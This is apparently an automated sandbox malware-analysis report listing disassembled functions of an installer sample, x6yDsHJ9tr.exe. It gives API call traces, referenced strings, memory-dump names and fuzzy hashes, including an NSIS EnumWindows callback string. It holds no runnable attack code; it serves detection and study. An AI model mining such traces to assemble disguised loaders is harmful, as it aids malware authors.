Part of subcall function 00406930: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069A2
Part of subcall function 00406930: CharNextW.USER32(?,"C:\Users\user\Desktop\x6yDsHJ9tr.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069A7
Part of subcall function 00406930: CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069BA

GetDiskFreeSpaceW.KERNEL32(00420F18,?,?,0000040F,?,00420F18,00420F18,?,?,00420F18,?,?,000003FB,?), ref: 00404D3A
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D55

Part of subcall function 00404EAE: lstrlenW.KERNEL32(00422F48,00422F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F4F
Part of subcall function 00404EAE: wsprintfW.USER32 ref: 00404F58
Part of subcall function 00404EAE: SetDlgItemTextW.USER32(?,00422F48), ref: 00404F6B

Strings

user32::EnumWindows(i r1 ,i 0), xrefs: 00404B0B
C:\Users\user\eftermodnendes\ringeagt, xrefs: 00404C42
Call, xrefs: 00404C53, 00404C58, 00404C63
H/B, xrefs: 00404BEF
A, xrefs: 00404C15

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\eftermodnendes\ringeagt$Call$H/B$user32::EnumWindows(i r1 ,i 0)
API String ID: 2624150263-2177096811
Opcode ID: 4cf00c73115f53cf57be461a99467e832b164710fce0f00c931b90381e9749c6
Instruction ID: 96009b05525636a0bc85a96efb184481c484ec56fefee2337862baa2afa4bf02
Opcode Fuzzy Hash: 4cf00c73115f53cf57be461a99467e832b164710fce0f00c931b90381e9749c6
Instruction Fuzzy Hash: DDA173B1900209ABDB11AFA5CD45AEFB7B8EF84314F11843BF601B62D1D77C99418B6D

Function 73471BFF Relevance: 20.1, APIs: 13, Instructions: 597stringlibrarymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 734712BB: GlobalAlloc.KERNELBASE(00000040,?,734712DB,?,7347137F,00000019,734711CA,-000000A0), ref: 734712C5

GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 73471D2D
lstrcpyW.KERNEL32(00000008,?), ref: 73471D75
lstrcpyW.KERNEL32(00000808,?), ref: 73471D7F
GlobalFree.KERNEL32(00000000), ref: 73471D92
GlobalFree.KERNEL32(?), ref: 73471E74
GlobalFree.KERNEL32(?), ref: 73471E79
GlobalFree.KERNEL32(?), ref: 73471E7E
GlobalFree.KERNEL32(00000000), ref: 73472068
lstrcpyW.KERNEL32(?,?), ref: 73472222
GetModuleHandleW.KERNEL32(00000008), ref: 734722A1
LoadLibraryW.KERNEL32(00000008), ref: 734722B2
GetProcAddress.KERNEL32(?,?), ref: 7347230C
lstrlenW.KERNEL32(00000808), ref: 73472326

Memory Dump Source

Source File: 00000000.00000002.3422662391.0000000073471000.00000020.00000001.01000000.00000005.sdmp, Offset: 73470000, based on PE: true

Associated: 00000000.00000002.3422423806.0000000073470000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3422678680.0000000073474000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3422693153.0000000073476000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73470000_x6yDsHJ9tr.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
String ID:
API String ID: 245916457-0
Opcode ID: 112ed65e04edae18aea6c652d1e90aa8a5c75abf4c4ba3bea1abec85b0df24e8
Instruction ID: 2defe8d22be57f99eb627f30d420bedef33aec9620f24b6d51525e28d6583c1c
Opcode Fuzzy Hash: 112ed65e04edae18aea6c652d1e90aa8a5c75abf4c4ba3bea1abec85b0df24e8
Instruction Fuzzy Hash: 28229A71D1064ADFDB19CFA4C9807EEB7F9FB08315F24452ED1A6E2280D7709A86CB58

Function 004021AF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004084DC,?,?,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E

Strings

C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet, xrefs: 0040226E

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet
API String ID: 542301482-3948318427
Opcode ID: 5b0014f3340ed2e8e047bae132ec64f51d2c526b3404a8b2a52325da7d94e0b0
Instruction ID: 6031f0b9305bb7b05064ab4f17c9904609ff1c452577966f293784d012f03e0b
Opcode Fuzzy Hash: 5b0014f3340ed2e8e047bae132ec64f51d2c526b3404a8b2a52325da7d94e0b0
Instruction Fuzzy Hash: 4A410475A00209AFCB40DFE4C989EAD7BB5BF48308B20457EF505EB2D1DB799982CB54

Function 00402910 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291F

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 209a06d9c3b4454fc5c1ff69253149a6aac46e41fe78177cd59690df36c1804c
Instruction ID: f0d7266373870d470beff65cac24d35b4a218527411e0b80208e5fb1e93adf0c
Opcode Fuzzy Hash: 209a06d9c3b4454fc5c1ff69253149a6aac46e41fe78177cd59690df36c1804c
Instruction Fuzzy Hash: 28F08271A04104AED701EBE4ED499AEB378EF14314F60057BE111F31E0D7B84E059B19

Function 0040506E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00405086
GetDlgItem.USER32(?,00000408), ref: 00405091
GlobalAlloc.KERNEL32(00000040,?), ref: 004050DB
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 004050F2
SetWindowLongW.USER32(?,000000FC,0040567B), ref: 0040510B
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040511F
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405131
SendMessageW.USER32(?,00001109,00000002), ref: 00405147
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405153
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405165
DeleteObject.GDI32(00000000), ref: 00405168
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405193
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040519F
SendMessageW.USER32(?,00001132,00000000,?), ref: 0040523A
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040526A

Part of subcall function 00404636: SendMessageW.USER32(00000028,?,?,00404461), ref: 00404644

SendMessageW.USER32(?,00001132,00000000,?), ref: 0040527E
GetWindowLongW.USER32(?,000000F0), ref: 004052AC
SetWindowLongW.USER32(?,000000F0,00000000), ref: 004052BA
ShowWindow.USER32(?,00000005), ref: 004052CA
SendMessageW.USER32(?,00000419,00000000,?), ref: 004053C5
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040542A
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040543F
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405463
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405483
ImageList_Destroy.COMCTL32(?), ref: 00405498
GlobalFree.KERNEL32(?), ref: 004054A8
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405521
SendMessageW.USER32(?,00001102,?,?), ref: 004055CA
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004055D9
InvalidateRect.USER32(?,00000000,?), ref: 00405604
ShowWindow.USER32(?,00000000), ref: 00405652
GetDlgItem.USER32(?,000003FE), ref: 0040565D
ShowWindow.USER32(00000000), ref: 00405664

Strings

, xrefs: 0040563C
N, xrefs: 00405303
M, xrefs: 00405222

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 324c1f4819b082b1ac23898fd696f3744d7b458a05ce4ad4b76fe224fda76cd4
Instruction ID: 3eec0fee992af157883e3c32035e614d90e83c27d9cb298499668aae57dc4bf7
Opcode Fuzzy Hash: 324c1f4819b082b1ac23898fd696f3744d7b458a05ce4ad4b76fe224fda76cd4
Instruction Fuzzy Hash: B4029D70A00608EFDB20DF64CD45AAF7BB5FB44314F10857AE910BA2E0D7B98A42DF18

Function 00404102 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 0040413E
ShowWindow.USER32(?), ref: 0040415E
GetWindowLongW.USER32(?,000000F0), ref: 00404170
ShowWindow.USER32(?,00000004), ref: 00404189
DestroyWindow.USER32 ref: 0040419D
SetWindowLongW.USER32(?,00000000,00000000), ref: 004041B6
GetDlgItem.USER32(?,?), ref: 004041D5
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041E9
IsWindowEnabled.USER32(00000000), ref: 004041F0
GetDlgItem.USER32(?,?), ref: 0040429B
GetDlgItem.USER32(?,00000002), ref: 004042A5
SetClassLongW.USER32(?,000000F2,?), ref: 004042BF
SendMessageW.USER32(0000040F,00000000,?,?), ref: 00404310
GetDlgItem.USER32(?,00000003), ref: 004043B6
ShowWindow.USER32(00000000,?), ref: 004043D7
EnableWindow.USER32(?,?), ref: 004043E9
EnableWindow.USER32(?,?), ref: 00404404
GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 0040441A
EnableMenuItem.USER32(00000000), ref: 00404421
SendMessageW.USER32(?,000000F4,00000000,?), ref: 00404439
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040444C
lstrlenW.KERNEL32(00422F48,?,00422F48,00000000), ref: 00404476
SetWindowTextW.USER32(?,00422F48), ref: 0040448A
ShowWindow.USER32(?,0000000A), ref: 004045BE

Strings

H/B, xrefs: 00404466

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
String ID: H/B
API String ID: 1860320154-184950203
Opcode ID: 6713c34f0db6ca24ad0fd02f4a6c26255f157c0ea2add66a7142b4456e47287b
Instruction ID: f8b0abefa6079376cca3afd4ac47b8e6787ccd0873a3a79b8952b84eeba681b3
Opcode Fuzzy Hash: 6713c34f0db6ca24ad0fd02f4a6c26255f157c0ea2add66a7142b4456e47287b
Instruction Fuzzy Hash: 91C1CFB1600204BBDB316F61EE85A2B7AB8EB85345F41053EF741B25F0CB795842DB2D

Function 004047C0 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,?), ref: 0040485E
GetDlgItem.USER32(?,000003E8), ref: 00404872
SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 0040488F
GetSysColor.USER32(?), ref: 004048A0
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004048AE
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004048BC
lstrlenW.KERNEL32(?), ref: 004048C1
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004048CE
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048E3
GetDlgItem.USER32(?,0000040A), ref: 0040493C
SendMessageW.USER32(00000000), ref: 00404943
GetDlgItem.USER32(?,000003E8), ref: 0040496E
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004049B1
LoadCursorW.USER32(00000000,00007F02), ref: 004049BF
SetCursor.USER32(00000000), ref: 004049C2
LoadCursorW.USER32(00000000,00007F00), ref: 004049DB
SetCursor.USER32(00000000), ref: 004049DE
SendMessageW.USER32(00000111,?,00000000), ref: 00404A0D
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404A1F

Strings

N, xrefs: 0040495C
Call, xrefs: 0040499D
7G@, xrefs: 004049CA

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: 7G@$Call$N
API String ID: 3103080414-3155595626
Opcode ID: b6dc2905c6216746abb3c0cd17d9c39e8b2e61a9098f8b336cb1d1698ee7a258
Instruction ID: cd0ff63a31a53d86839c1a5ce07a34679cc09665db384d3569e6db54912acae5
Opcode Fuzzy Hash: b6dc2905c6216746abb3c0cd17d9c39e8b2e61a9098f8b336cb1d1698ee7a258
Instruction Fuzzy Hash: 9061B0B1A40209BFDB10AF64CD85EAA7B69FB84305F00843AF605B72D0D779AD51CF98

Function 004062C8 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,00406463,?,?), ref: 00406303
GetShortPathNameW.KERNEL32(?,004265E8,00000400), ref: 0040630C

Part of subcall function 004060D7: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E7
Part of subcall function 004060D7: lstrlenA.KERNEL32(00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406119

GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 00406329
wsprintfA.USER32 ref: 00406347
GetFileSize.KERNEL32(00000000,00000000,00426DE8,C0000000,00000004,00426DE8,?,?,?,?,?), ref: 00406382
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406391
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063C9
SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004261E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 0040641F
GlobalFree.KERNEL32(00000000), ref: 00406430
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406437

Part of subcall function 00406172: GetFileAttributesW.KERNELBASE(00000003,00403118,C:\Users\user\Desktop\x6yDsHJ9tr.exe,80000000,00000003), ref: 00406176
Part of subcall function 00406172: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00406198

Strings

mB, xrefs: 0040631E
[Rename], xrefs: 004063B1, 004063C3
mB, xrefs: 00406325
%ls=%ls, xrefs: 0040633D
eB, xrefs: 004062F1

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]$eB$mB$mB
API String ID: 2171350718-2529913679
Opcode ID: db523023045b127196975f0173c88122861a3a00dd6e7a8812d5311d7169504c
Instruction ID: 393dc7f902851ea198dcc63c4c4a9d42cf85fc1b4335f85fcc59b0ede2066cac
Opcode Fuzzy Hash: db523023045b127196975f0173c88122861a3a00dd6e7a8812d5311d7169504c
Instruction Fuzzy Hash: 35313571600325BBD2206B29AD49F6B3A6CDF41744F17003AF902F62D3DA7CD82686BC

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,?), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00428A60,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 9a1d1952d02a6587733a796de720c08d05f060e36ce2c67ddab1b612aed24319
Instruction ID: 3c33d73dbc2ffdf14e434cca4ae815e9cfbd561affca8d3971a90777bf4c3be5
Opcode Fuzzy Hash: 9a1d1952d02a6587733a796de720c08d05f060e36ce2c67ddab1b612aed24319
Instruction Fuzzy Hash: 34418B71800249AFCF058FA5DE459AFBBB9FF45314F00802EF592AA1A0CB34DA55DFA4

Function 00406930 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\x6yDsHJ9tr.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00406993
CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069A2
CharNextW.USER32(?,"C:\Users\user\Desktop\x6yDsHJ9tr.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069A7
CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069BA

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00406931
"C:\Users\user\Desktop\x6yDsHJ9tr.exe", xrefs: 00406974
*?|<>/":, xrefs: 00406982

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\x6yDsHJ9tr.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-3560645010
Opcode ID: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
Instruction ID: f71de53da442769783aaa0cb2fea73a85be5ebad64e4744dd58b15c84f46a956
Opcode Fuzzy Hash: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
Instruction Fuzzy Hash: 2211C8A580021295DB303B548D40B7766F8AF59790F56403FED96B3AC1E77C4C9282BD

Function 00404668 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00404685
GetSysColor.USER32(00000000), ref: 004046C3
SetTextColor.GDI32(?,00000000), ref: 004046CF
SetBkMode.GDI32(?,?), ref: 004046DB
GetSysColor.USER32(?), ref: 004046EE
SetBkColor.GDI32(?,?), ref: 004046FE
DeleteObject.GDI32(?), ref: 00404718
CreateBrushIndirect.GDI32(?), ref: 00404722

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
